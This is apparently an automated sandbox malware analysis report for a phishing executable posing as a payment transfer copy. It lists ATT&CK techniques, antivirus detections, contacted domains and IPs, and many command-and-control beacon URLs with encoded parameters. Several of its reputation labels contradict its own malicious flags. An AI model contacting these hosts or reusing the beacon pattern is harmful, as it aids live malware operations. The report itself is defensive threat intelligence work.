Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	Input Capture1	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information41	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	25%	Virustotal		Browse
Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	28%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2b80000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.explorer.exe.330000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
td-balancer-euw2-6-109.wixdns.net	0%	Virustotal		Browse
www.zomapa.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.zomapa.com/blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L	0%	Avira URL Cloud	safe
http://www.jasa-software.com/blr/	0%	Avira URL Cloud	safe
http://www.olgadalila.com	0%	Avira URL Cloud	safe
http://www.prodhealth.site	0%	Avira URL Cloud	safe
http://www.sweetpopntreatz.comReferer:	0%	Avira URL Cloud	safe
http://www.jaemagreci.com	0%	Avira URL Cloud	safe
http://www.zomapa.com	0%	Avira URL Cloud	safe
http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.com	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.gannahealing.com	0%	Avira URL Cloud	safe
http://www.prodhealth.siteReferer:	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.gannahealing.com/blr/	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.stanchilo.com/blr/	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.cvmjqcid.com/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L	0%	Avira URL Cloud	safe
http://www.sweetpopntreatz.com/blr/www.long9000.com	0%	Avira URL Cloud	safe
http://www.kanaai.com/blr/	0%	Avira URL Cloud	safe
http://www.na230.com/blr/www.jasa-software.com	0%	Avira URL Cloud	safe
http://www.prodhealth.site/blr/	0%	Avira URL Cloud	safe
http://www.carbeloy.com/blr/	0%	Avira URL Cloud	safe
http://www.gannahealing.comReferer:	0%	Avira URL Cloud	safe
http://www.zomapa.comReferer:	0%	Avira URL Cloud	safe
http://www.gannahealing.com/blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L	0%	Avira URL Cloud	safe
http://www.kathrynbaierling.com/blr/	0%	Avira URL Cloud	safe
http://www.soheilvaseghi.comReferer:	0%	Avira URL Cloud	safe
http://www.jasa-software.com/blr/j	0%	Avira URL Cloud	safe
http://www.kanaai.com/blr/www.cvmjqcid.com	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sweetpopntreatz.com/blr/	0%	Avira URL Cloud	safe
http://www.olgadalila.comReferer:	0%	Avira URL Cloud	safe
http://www.yoshiyama-potager.com	0%	Avira URL Cloud	safe
http://www.long9000.com/blr/	0%	Avira URL Cloud	safe
http://www.cvmjqcid.com/blr/www.jaemagreci.com	0%	Avira URL Cloud	safe
http://www.na230.comReferer:	0%	Avira URL Cloud	safe
http://www.prodhealth.site/blr/www.stanchilo.com	0%	Avira URL Cloud	safe
http://www.kanaai.com	0%	Avira URL Cloud	safe
http://www.na230.com/blr/	0%	Avira URL Cloud	safe
http://www.yoshiyama-potager.com/blr/	0%	Avira URL Cloud	safe
http://www.na230.com	0%	Avira URL Cloud	safe
http://www.long9000.com/blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L	0%	Avira URL Cloud	safe
www.jaemagreci.com/blr/	0%	Avira URL Cloud	safe
http://www.kathrynbaierling.com	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jaemagreci.comReferer:	0%	Avira URL Cloud	safe
http://www.kathrynbaierling.comReferer:	0%	Avira URL Cloud	safe
http://www.jasa-software.comReferer:	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.soheilvaseghi.com	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.yoshiyama-potager.comReferer:	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.stanchilo.com	0%	Avira URL Cloud	safe
http://www.long9000.comReferer:	0%	Avira URL Cloud	safe
http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ix	0%	Avira URL Cloud	safe
http://www.long9000.com/blr/www.soheilvaseghi.com	0%	Avira URL Cloud	safe
http://www.zomapa.com/blr/	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.zomapa.com/blr/www.carbeloy.com	0%	Avira URL Cloud	safe
http://www.olgadalila.com/blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L	0%	Avira URL Cloud	safe
http://www.carbeloy.comReferer:	0%	Avira URL Cloud	safe
http://www.soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.carbeloy.com	0%	Avira URL Cloud	safe
http://www.kathrynbaierling.com/blr/www.na230.com	0%	Avira URL Cloud	safe
http://www.jasa-software.com	0%	Avira URL Cloud	safe
http://www.olgadalila.com/blr/www.zomapa.com	0%	Avira URL Cloud	safe
http://www.cvmjqcid.com/blr/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sweetpopntreatz.com	34.102.136.180	true	true		unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	true	0%, Virustotal, Browse	unknown
www.zomapa.com	164.155.144.220	true	true	0%, Virustotal, Browse	unknown
jaemagreci.com	50.116.112.43	true	true		unknown
gannahealing.com	176.74.27.137	true	true		unknown
www.long9000.com	198.52.105.123	true	true		unknown
cvmjqcid.com	210.152.86.132	true	true		unknown
vaseghi.github.io	185.199.108.153	true	true		unknown
olgadalila.com	198.27.88.111	true	true		unknown
www.jaemagreci.com	unknown	unknown	true		unknown
www.soheilvaseghi.com	unknown	unknown	true		unknown
www.kanaai.com	unknown	unknown	true		unknown
www.gannahealing.com	unknown	unknown	true		unknown
www.olgadalila.com	unknown	unknown	true		unknown
www.cvmjqcid.com	unknown	unknown	true		unknown
www.sweetpopntreatz.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.zomapa.com/blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
http://www.cvmjqcid.com/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
http://www.gannahealing.com/blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
http://www.long9000.com/blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
www.jaemagreci.com/blr/	true	Avira URL Cloud: safe	low
http://www.olgadalila.com/blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
http://www.soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
http://www.sweetpopntreatz.com/blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
http://www.kanaai.com/blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown
http://www.jaemagreci.com/blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.jasa-software.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.olgadalila.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.prodhealth.site	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sweetpopntreatz.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jaemagreci.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zomapa.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	false		high
http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.gannahealing.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.prodhealth.siteReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.gannahealing.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.stanchilo.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sweetpopntreatz.com/blr/www.long9000.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kanaai.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.na230.com/blr/www.jasa-software.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.prodhealth.site/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carbeloy.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gannahealing.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zomapa.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kathrynbaierling.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soheilvaseghi.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jasa-software.com/blr/j	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kanaai.com/blr/www.cvmjqcid.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sweetpopntreatz.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.olgadalila.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoshiyama-potager.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.long9000.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cvmjqcid.com/blr/www.jaemagreci.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.na230.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.prodhealth.site/blr/www.stanchilo.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kanaai.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.na230.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoshiyama-potager.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.na230.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.kathrynbaierling.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jaemagreci.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kathrynbaierling.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jasa-software.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.soheilvaseghi.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.yoshiyama-potager.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.stanchilo.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.long9000.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ix	explorer.exe, 00000009.00000002.748643610.000000000561F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.long9000.com/blr/www.soheilvaseghi.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zomapa.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zomapa.com/blr/www.carbeloy.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carbeloy.comReferer:	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sakkal.com	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carbeloy.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kathrynbaierling.com/blr/www.na230.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jasa-software.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.olgadalila.com/blr/www.zomapa.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cvmjqcid.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soheilvaseghi.com/blr/www.gannahealing.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cvmjqcid.com	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soheilvaseghi.com/blr/	explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
